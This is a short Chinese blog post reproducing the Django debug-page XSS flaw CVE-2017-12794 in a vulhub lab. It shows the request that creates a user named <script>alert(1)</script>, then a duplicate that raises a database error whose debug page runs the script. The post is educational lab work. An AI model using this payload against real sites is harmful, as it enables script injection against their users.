0
点赞
收藏
分享

微信扫一扫

Django debug page XSS漏洞复现_(CVE-2017-12794)

幸甚至哉歌以咏志 2023-11-12 阅读 33
djangoxsspython网络安全安全web安全

Django debug page XSS漏洞复现_(CVE-2017-12794)

复现过程

首先进入靶场环境

image-20231110152918702

按照他写的,需要给这个变量赋值

image-20231110153700531

创建一个用户,用弹窗做用户名

http://10.4.7.137:8000/create_user/?username=<script>alert(1)</script>

image-20231110153946042

返回,然后再创建一个一样的

触发异常弹窗

image-20231110154031232

异常为

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.

详情见

https://vulhub.org/#/environments/django/CVE-2017-12794/

举报

相关推荐

CVE-2017-12794_Django debug page XSS漏洞

djangoxsspython

漏洞复现报告:CVE-2017-7103 JQuery框架XSS漏洞

jQuery网络安全

CVE-2017-12615漏洞复现

编程编程语言c++

漏洞复现报告:CVE-2017-18349

jsonjava网络安全

【Vulfocus漏洞复现】tomcat-cve_2017_12615

安全

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现

安全

CVE-2017-8046-Spring Data Rest RCE 漏洞复现

安全web安全框架

Apache HTTPD (CVE-2017-15715)换行解析漏洞复现

人工智能chatgptelasticsearch数据库大数据全文检索搜索引擎

Apache httpd 换行解析漏洞复现(CVE-2017-15715)

机器学习逻辑回归人工智能

Django SQL注入漏洞复现 (CVE-2022-28347)

DjangoSQL注入漏洞复现
0 条评论